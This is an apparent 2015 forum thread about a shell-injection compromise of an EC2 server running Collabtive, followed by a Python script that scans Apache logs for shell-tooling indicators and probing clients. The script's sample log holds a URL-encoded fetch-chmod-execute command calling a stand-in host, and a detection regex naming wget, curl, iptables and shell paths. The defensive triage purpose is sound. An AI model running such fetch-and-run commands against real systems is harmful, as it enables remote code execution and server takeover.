
Some sort of injection attack

Posted: 15.04.2015, 15:56
by Baaleos
So - I host my Collabtive instance in Amazon EC2.
Today I got a shock when I discovered that since installing Collabtive my instance has somehow been churning out 8GB of data per hour.
(About $80 for the last 4-5 days)

I initially thought it was something to do with a build script that was being used by Jenkins - hosted on the same instance, but when reviewing my apache2 access logs I found what looks like a shell injection through collabtive.

Basically, somehow the GET request to apache2 was able to perform a curl and wget on a URL, download a linux binary, and then start it.
They also messed around with iptables etc.

I just figured I should post this here, as it may or may not be a vulnerability with Collabtive.
Note: Collabtive was installed following a guide I found online.

Re: Some sort of injection attack

Posted: 17.04.2015, 02:19
by Philipp
I don't think this is related to Collabtive.

A couple of points here:
1. I can't see in those HTTP requests where any part (script) that belongs to Collabtive is being handed any data that could be injected somewhere at all.
In fact all requests seem to go to the / (root) path of the (sub)domain.
So while this may run on the subdomain you have configured Collabtive on, Collabtive doesn't seem to be involved.

2. Most of those GET requests seem to be probing for some version of nagios plugins. Probably to exploit those.

3. The offending request seems to be some kind of shell exploit that uses wget etc indeed.
However, even if Collabtive was involved - there is no code in Collabtive that can call any shell commands or run strings on the system console otherwise (like wget). So Collabtive generally is not vulnerable to these sorts of attack.

So this seems to be an attack on your apache server, nagios or some other part of your stack rather than Collabtive.
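The two posts above describe the same triage steps a defender would script: read the Apache access log, find requests whose decoded query carries shell tooling such as wget, curl, chmod or iptables, and look at which clients are spraying requests at paths that do not exist (the "probing for nagios plugins" pattern Philipp points out). The following is an added example, not code from the thread, from Collabtive or from any of the posters. The log lines, the IP addresses and the host `malicious.example` are constructed for the demonstration, and the log format assumed is Apache's default combined format.

```python
import re
from collections import Counter
from urllib.parse import unquote

# Constructed sample access log lines (Apache combined format); not real traffic.
SAMPLE_LOG = [
    '203.0.113.5 - - [15/Apr/2015:10:02:11 +0000] "GET / HTTP/1.1" 200 512 "-" "Mozilla/5.0"',
    '198.51.100.7 - - [15/Apr/2015:10:03:01 +0000] "GET /cgi-bin/check_example.cgi HTTP/1.1" 404 209 "-" "-"',
    '198.51.100.7 - - [15/Apr/2015:10:03:02 +0000] "GET /cgi-bin/check_other.cgi HTTP/1.1" 404 209 "-" "-"',
    '198.51.100.7 - - [15/Apr/2015:10:03:05 +0000] '
    '"GET /?cmd=cd%20/tmp;wget%20http://malicious.example/x;chmod%20%2Bx%20x;./x HTTP/1.1" 200 0 "-" "-"',
    '203.0.113.9 - - [15/Apr/2015:10:05:44 +0000] "GET /collabtive/index.php HTTP/1.1" 200 4096 "-" "Mozilla/5.0"',
]

# Apache "combined" log format: client, ident, user, [timestamp], "request", status, size, "referer", "user-agent".
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<path>\S+)(?: (?P<proto>[^"]*))?" '
    r'(?P<status>\d{3}) (?P<size>\S+)'
    r'(?: "(?P<referer>[^"]*)" "(?P<ua>[^"]*)")?'
)

# Tokens that have no business appearing in a request to a web app: downloaders,
# permission changes, firewall tooling and shell interpreters.
SHELL_INDICATORS = re.compile(r'(?i)\b(?:wget|curl|iptables|chmod)\b|/bin/(?:ba)?sh\b')


def parse_line(line):
    """Return the log fields as a dict, or None if the line is not combined format."""
    m = LOG_RE.match(line)
    return m.groupdict() if m else None


def flag_shell_indicators(lines):
    """Return (client_ip, decoded_request, [indicators]) for every request that
    carries shell tooling in its URL-decoded path, referer or user agent."""
    hits = []
    for line in lines:
        rec = parse_line(line)
        if rec is None:
            continue
        decoded_path = unquote(rec["path"])  # %20, %2B etc. hide the command from a naive grep
        haystack = " ".join([decoded_path, rec.get("referer") or "", rec.get("ua") or ""])
        found = sorted({m.group(0).lower() for m in SHELL_INDICATORS.finditer(haystack)})
        if found:
            hits.append((rec["ip"], decoded_path, found))
    return hits


def requests_per_client(lines):
    """Count requests per source IP; a scanner stands out by volume."""
    counts = Counter()
    for line in lines:
        rec = parse_line(line)
        if rec:
            counts[rec["ip"]] += 1
    return counts


def not_found_per_client(lines):
    """Count 404 responses per source IP; many 404s from one client is classic path probing."""
    counts = Counter()
    for line in lines:
        rec = parse_line(line)
        if rec and rec["status"] == "404":
            counts[rec["ip"]] += 1
    return counts


if __name__ == "__main__":
    for ip, req, found in flag_shell_indicators(SAMPLE_LOG):
        print(f"shell indicators {found} from {ip}: {req}")
    print("requests per client:", dict(requests_per_client(SAMPLE_LOG)))
    print("404s per client:", dict(not_found_per_client(SAMPLE_LOG)))
```

Run against a real log, the two counters give you the scanning clients and the indicator scan gives you the request that actually delivered the payload; in the sample, the same client that probed two non-existent CGI paths is the one whose decoded query string contains `wget` and `chmod`. Decoding the path before matching matters: in the raw log the command is spelled with `%20` and `%2B`, so a plain search for `wget ` with a trailing space would miss it.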